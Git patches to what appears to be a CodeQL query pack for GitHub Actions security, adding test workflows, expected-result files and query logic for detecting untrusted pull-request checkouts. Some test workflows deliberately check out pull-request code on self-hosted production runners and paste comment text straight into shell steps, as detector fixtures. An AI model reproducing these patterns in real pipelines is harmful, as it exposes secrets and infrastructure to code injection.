's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml new file mode 100644 index 00000000000..0be96a4140e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml @@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index d9cbfe804ae..4fbfca24126 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -188,6 +188,43 @@ edges | .github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | | .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | | .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | +| .github/workflows/test14.yml:38:7:41:4 | Uses Step | .github/workflows/test14.yml:41:7:44:4 | Run Step | +| .github/workflows/test14.yml:41:7:44:4 | Run Step | .github/workflows/test14.yml:44:7:58:4 | Run Step | +| .github/workflows/test14.yml:44:7:58:4 | Run Step | .github/workflows/test14.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test14.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test14.yml:94:7:101:4 | Uses Step | +| .github/workflows/test14.yml:94:7:101:4 | Uses Step | .github/workflows/test14.yml:101:7:105:4 | Uses Step | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | .github/workflows/test14.yml:105:7:111:4 | Uses Step | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | .github/workflows/test14.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test14.yml:135:7:141:4 | Run Step: email | .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test14.yml:169:7:174:4 | Uses Step | +| .github/workflows/test14.yml:169:7:174:4 | Uses Step | .github/workflows/test14.yml:174:7:187:4 | Run Step | +| .github/workflows/test14.yml:174:7:187:4 | Run Step | .github/workflows/test14.yml:187:7:198:4 | Run Step | +| .github/workflows/test14.yml:187:7:198:4 | Run Step | .github/workflows/test14.yml:198:7:206:4 | Uses Step | +| .github/workflows/test14.yml:198:7:206:4 | Uses Step | .github/workflows/test14.yml:206:7:226:4 | Uses Step | +| .github/workflows/test14.yml:206:7:226:4 | Uses Step | .github/workflows/test14.yml:226:7:227:45 | Run Step | +| .github/workflows/test15.yml:38:7:56:4 | Run Step: environment | .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test15.yml:60:7:65:4 | Uses Step | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | .github/workflows/test15.yml:65:7:68:4 | Uses Step | +| .github/workflows/test15.yml:65:7:68:4 | Uses Step | .github/workflows/test15.yml:68:7:83:2 | Run Step | +| .github/workflows/test15.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test15.yml:110:7:115:4 | Uses Step | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | .github/workflows/test15.yml:115:7:120:4 | Uses Step | +| .github/workflows/test15.yml:115:7:120:4 | Uses Step | .github/workflows/test15.yml:120:7:127:4 | Run Step | +| .github/workflows/test15.yml:120:7:127:4 | Run Step | .github/workflows/test15.yml:127:7:131:4 | Run Step | +| .github/workflows/test15.yml:127:7:131:4 | Run Step | .github/workflows/test15.yml:131:7:136:4 | Run Step | +| .github/workflows/test15.yml:131:7:136:4 | Run Step | .github/workflows/test15.yml:136:7:141:2 | Run Step | +| .github/workflows/test15.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test15.yml:173:7:180:4 | Uses Step | +| .github/workflows/test15.yml:173:7:180:4 | Uses Step | .github/workflows/test15.yml:180:7:185:4 | Uses Step | +| .github/workflows/test15.yml:180:7:185:4 | Uses Step | .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | .github/workflows/test15.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test15.yml:197:7:203:4 | Run Step: email | .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test15.yml:231:7:236:4 | Uses Step | +| .github/workflows/test15.yml:231:7:236:4 | Uses Step | .github/workflows/test15.yml:236:7:242:4 | Run Step | +| .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | +| .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | +| .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From 610dcaf23dfe2915c6451dc565ddb5f16254e247 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 12:31:19 +0200 Subject: [PATCH 0523/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b4c388cf615..84d4f5f3678 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.50 +version: 0.1.51 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e5709a52329..0ef4c721e1a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.50 +version: 0.1.51 groups: [actions, queries] suites: codeql-suites extractor: javascript From 2bfb1565086edc3ab56d7dd1e19fcb0055658c1d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 23:08:58 +0200 Subject: [PATCH 0524/1267] d /Users/pwntester/src/github.com/github/codeql-actions/ql --- ql/lib/codeql/actions/ast/internal/Ast.qll | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d0eb440d0d5..7458cc1b053 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -416,6 +416,12 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + override EventImpl getATriggerEvent() { + this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result + or + this.getOn().getAnEvent() = result and not result.getName() = "workflow_call" + } + OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } @@ -796,12 +802,11 @@ class JobImpl extends AstNodeImpl, TJobNode { StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + EventImpl getATriggerEvent() { + result = this.getEnclosingWorkflow().getATriggerEvent() or + result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + } - // private predicate hasSingleTrigger(string trigger) { - // this.getATriggerEvent().getName() = trigger and - // count(this.getATriggerEvent()) = 1 - // } /** Gets the runs-on field of the job. */ string getARunsOnLabel() { exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | From fe06c9e5fa186e27fbe1e2134926b08982a9dfef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 12:12:09 +0200 Subject: [PATCH 0525/1267] d /Users/pwntester/src/github.com/github/codeql-actions/ql --- ql/lib/codeql/actions/ast/internal/Ast.qll | 64 +++++++++++++++++-- .../codeql/actions/security/ControlChecks.qll | 2 +- .../CWE-829/UntrustedCheckoutCritical.ql | 33 ++++------ .../Security/CWE-829/UntrustedCheckoutHigh.ql | 33 ++++------ .../.github/workflows/documentation.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 2 - .../CWE-078/CommandInjectionMedium.expected | 1 - .../workflows/reusable-workflow-caller-1.yml | 4 +- .../workflows/reusable-workflow-caller-2.yml | 4 +- .../CWE-094/CodeInjectionCritical.expected | 12 ++-- .../CWE-094/CodeInjectionMedium.expected | 12 ++-- .../.github/workflows/reusable_caller3.yaml | 2 +- .../UntrustedCheckoutCritical.expected | 2 - .../CWE-829/UntrustedCheckoutHigh.expected | 4 -- .../CWE-829/UntrustedCheckoutMedium.expected | 6 ++ 15 files changed, 102 insertions(+), 81 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7458cc1b053..d05174f4787 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -417,8 +417,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override EventImpl getATriggerEvent() { + // The trigger event for a reusable workflow is the trigger event of the caller workflow this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result or + // or the trigger event of the workflow if it has any other than workflow_call this.getOn().getAnEvent() = result and not result.getName() = "workflow_call" } @@ -803,8 +805,13 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the trigger event that starts this workflow. */ EventImpl getATriggerEvent() { - result = this.getEnclosingWorkflow().getATriggerEvent() or - result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl + then + result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + or + result = this.getEnclosingWorkflow().getATriggerEvent() and + not result.getName() = "workflow_call" + else result = this.getEnclosingWorkflow().getATriggerEvent() } /** Gets the runs-on field of the job. */ @@ -844,9 +851,8 @@ class JobImpl extends AstNodeImpl, TJobNode { ) } - private predicate hasExplicitWritePermission() { - // the job has an explicit write permission - this.getPermissions().getAPermission().matches("%write") + private predicate hasExplicitNonePermission() { + exists(this.getPermissions()) and not exists(this.getPermissions().getAPermission()) } private predicate hasExplicitReadPermission() { @@ -855,15 +861,57 @@ class JobImpl extends AstNodeImpl, TJobNode { not this.getPermissions().getAPermission().matches("%write") } - private predicate hasImplicitWritePermission() { + private predicate hasExplicitWritePermission() { // the job has an explicit write permission - this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasImplicitNonePermission() { + not exists(this.getPermissions()) and + exists(this.getEnclosingWorkflow().getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getPermissions()) and + not exists( + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + ) } private predicate hasImplicitReadPermission() { // the job has not an explicit write permission + not exists(this.getPermissions()) and exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%read") + } + + private predicate hasImplicitWritePermission() { + // the job has an explicit write permission + not exists(this.getPermissions()) and + this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%write") } private predicate hasRuntimeData() { @@ -922,6 +970,8 @@ class JobImpl extends AstNodeImpl, TJobNode { // and the job is not explicitly non-privileged not ( ( + this.hasExplicitNonePermission() or + this.hasImplicitNonePermission() or this.hasExplicitReadPermission() or this.hasImplicitReadPermission() ) and diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 1a47f4d92d0..1a3e1e15fe8 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -38,7 +38,7 @@ abstract class ControlCheck extends AstNode { } predicate protects(Step step, Event event, string category) { - event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and + event = step.getEnclosingWorkflow().getATriggerEvent() and this.dominates(step) and this.protectsCategoryAndEvent(category, event.getName()) } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 9efd9b036cd..31a4cdf94e5 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,39 +20,28 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep step +from PRHeadCheckoutStep checkout, PoisonableStep step, Event event where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(checkout) and + event = checkout.getEnclosingJob().getATriggerEvent() and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event event | - event = checkout.getEnclosingJob().getATriggerEvent() and + event.getName() = "issue_comment" and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( - event.getName() = "issue_comment" - or - event.getName() = "workflow_call" and - checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = - "issue_comment" + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck ) and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(checkout) and - date_check.dominates(checkout) - ) + check.dominates(checkout) and + date_check.dominates(checkout) ) or // not issue_comment triggered workflows - exists(Event event | - not event.getName() = "issue_comment" and - event = checkout.getEnclosingJob().getATriggerEvent() and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) - ) + not event.getName() = "issue_comment" and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) select step, checkout, step, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index ce138fb0478..bc6f0e36e56 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -18,39 +18,28 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout, Event event where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout) and + event = checkout.getEnclosingJob().getATriggerEvent() and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event event | - event = checkout.getEnclosingJob().getATriggerEvent() and + event.getName() = "issue_comment" and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( - event.getName() = "issue_comment" - or - event.getName() = "workflow_call" and - checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = - "issue_comment" + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck ) and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(checkout) and - date_check.dominates(checkout) - ) + check.dominates(checkout) and + date_check.dominates(checkout) ) or // not issue_comment triggered workflows - exists(Event event | - not event.getName() = "issue_comment" and - event = checkout.getEnclosingJob().getATriggerEvent() and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) - ) + not event.getName() = "issue_comment" and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml index 46ffbce9628..db04b69ac16 100644 --- a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml @@ -2,7 +2,7 @@ name: Documentation on: workflow_dispatch: - workflow_call: + pull_request: jobs: parse_commit_info: diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index e2fe23cccc6..decabad082f 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -1,8 +1,6 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | 